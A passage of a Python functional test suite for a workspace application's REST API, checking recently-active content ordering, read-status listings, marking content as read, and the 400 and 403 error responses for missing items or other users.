"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=400,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND
def test_api__get_recently_active_content__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
secondly_created = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
secondly_created_but_not_updated = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
secondly_created_but_not_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
res = res.json_body
assert len(res) == 7
for elem in res:
assert isinstance(elem["content_id"], int)
assert isinstance(elem["content_type"], str)
assert elem["content_type"] != "comments"
assert isinstance(elem["is_archived"], bool)
assert isinstance(elem["is_deleted"], bool)
assert isinstance(elem["label"], str)
assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
assert isinstance(elem["show_in_ui"], bool)
assert isinstance(elem["slug"], str)
assert isinstance(elem["status"], str)
assert isinstance(elem["sub_content_types"], list)
for sub_content_type in elem["sub_content_types"]:
assert isinstance(sub_content_type, str)
assert isinstance(elem["workspace_id"], int)
# comment is newest than page2
assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
# last updated content is newer than other one despite creation
# of the other is more recent
assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
# creation order is inverted here as last created is last active
assert res[4]["content_id"] == secondly_created.content_id
assert res[5]["content_id"] == firstly_created.content_id
# folder subcontent modification does not change folder order
assert res[6]["content_id"] == main_folder.content_id
def test_api__get_recently_active_content__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/recently_active".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api__get_recently_active_content__ok__200__limit_2_multiple(self):
# TODO - G.M - 2018-07-20 - Better fix for this test, do not use sleep()
# anymore to fix datetime lack of precision.
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
secondly_created_but_not_updated = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
secondly_created_but_not_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"limit": 2}
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
for elem in res:
assert isinstance(elem["content_id"], int)
assert isinstance(elem["content_type"], str)
assert elem["content_type"] != "comments"
assert isinstance(elem["is_archived"], bool)
assert isinstance(elem["is_deleted"], bool)
assert isinstance(elem["label"], str)
assert isinstance(elem["parent_id"], int) or elem["parent_id"] is None
assert isinstance(elem["show_in_ui"], bool)
assert isinstance(elem["slug"], str)
assert isinstance(elem["status"], str)
assert isinstance(elem["sub_content_types"], list)
for sub_content_type in elem["sub_content_types"]:
assert isinstance(sub_content_type, str)
assert isinstance(elem["workspace_id"], int)
# comment is newest than page2
assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
params = {"limit": 2, "before_content_id": secondly_created_but_not_commented.content_id}
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
status=200,
params=params,
)
res = res.json_body
assert len(res) == 2
# last updated content is newer than other one despite creation
# of the other is more recent
assert res[0]["content_id"] == firstly_created_but_recently_updated.content_id
assert res[1]["content_id"] == secondly_created_but_not_updated.content_id
def test_api__get_recently_active_content__err__400__bad_before_content_id(self):
# TODO - G.M - 2018-07-20 - Better fix for this test, do not use sleep()
# anymore to fix datetime lack of precision.
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
params = {"before_content_id": 4000}
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/recently_active".format(workspace.workspace_id),
status=400,
params=params,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND
class TestUserReadStatusEndpoint(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status
"""
def test_api__get_read_status__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
secondly_created = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
secondly_created_but_not_updated = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
secondly_created_but_not_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
res = res.json_body
assert len(res) == 7
for elem in res:
assert isinstance(elem["content_id"], int)
assert isinstance(elem["read_by_user"], bool)
# comment is newest than page2
assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
assert res[1]["content_id"] == secondly_created_but_not_commented.content_id
# last updated content is newer than other one despite creation
# of the other is more recent
assert res[2]["content_id"] == firstly_created_but_recently_updated.content_id
assert res[3]["content_id"] == secondly_created_but_not_updated.content_id
# creation order is inverted here as last created is last active
assert res[4]["content_id"] == secondly_created.content_id
assert res[5]["content_id"] == firstly_created.content_id
# folder subcontent modification does not change folder order
assert res[6]["content_id"] == main_folder.content_id
def test_api__get_read_status__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
selected_contents_id = [
firstly_created_but_recently_commented.content_id,
firstly_created_but_recently_updated.content_id,
firstly_created.content_id,
main_folder.content_id,
]
params = {
"content_ids": "{cid1},{cid2},{cid3},{cid4}".format(
cid1=selected_contents_id[0],
cid2=selected_contents_id[1],
cid3=selected_contents_id[2],
cid4=selected_contents_id[3],
)
}
url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
workspace_id=workspace.workspace_id, user_id=test_user.user_id
)
res = self.testapp.get(url=url, status=200, params=params)
res = res.json_body
assert len(res) == 4
for elem in res:
assert isinstance(elem["content_id"], int)
assert isinstance(elem["read_by_user"], bool)
# comment is newest than page2
assert res[0]["content_id"] == firstly_created_but_recently_commented.content_id
# last updated content is newer than other one despite creation
# of the other is more recent
assert res[1]["content_id"] == firstly_created_but_recently_updated.content_id
# creation order is inverted here as last created is last active
assert res[2]["content_id"] == firstly_created.content_id
# folder subcontent modification does not change folder order
assert res[3]["content_id"] == main_folder.content_id
def test_api__get_read_status__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
workspace2 = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace2", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder_workspace2 = api.create(
content_type_list.Folder.slug, workspace2, None, "Hepla", "", True
)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another creation_order_test",
"",
True,
)
# update order test
firstly_created_but_recently_updated = api.create(
content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"another update_order_test",
"",
True,
)
with new_revision(
session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
):
firstly_created_but_recently_updated.description = "Just an update"
api.save(firstly_created_but_recently_updated)
# comment change order
firstly_created_but_recently_commented = api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is randomized label content",
"",
True,
)
api.create(
content_type_list.Page.slug,
workspace,
main_folder,
"this is another randomized label content",
"",
True,
)
api.create_comment(
workspace, firstly_created_but_recently_commented, "juste a super comment", True
)
api.create(
content_type_list.Page.slug,
workspace2,
main_folder_workspace2,
"content_workspace_2",
"",
True,
)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
selected_contents_id = [
firstly_created_but_recently_commented.content_id,
firstly_created_but_recently_updated.content_id,
firstly_created.content_id,
main_folder.content_id,
]
params = {
"content_ids": "{cid1},{cid2},{cid3},{cid4}".format(
cid1=selected_contents_id[0],
cid2=selected_contents_id[1],
cid3=selected_contents_id[2],
cid4=selected_contents_id[3],
)
}
url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
workspace_id=workspace.workspace_id, user_id=admin.user_id
)
res = self.testapp.get(url=url, status=403, params=params)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserSetContentAsRead(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read
"""
def test_api_set_content_as_read__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(firstly_created)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
# read
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
def test_api_set_content_as_read__ok__200__admin_workspace_do_not_exist(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(firstly_created)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# read
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=4000, content_id=firstly_created.content_id, user_id=test_user.user_id
),
status=400,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND
def test_api_set_content_as_read__ok__200__admin_content_do_not_exist(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(firstly_created)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# read
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id, content_id=4000, user_id=test_user.user_id
),
status=400,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND
def test_api_set_content_as_read__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(firstly_created)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
# read
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
def test_api_set_content_as_read__ok__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
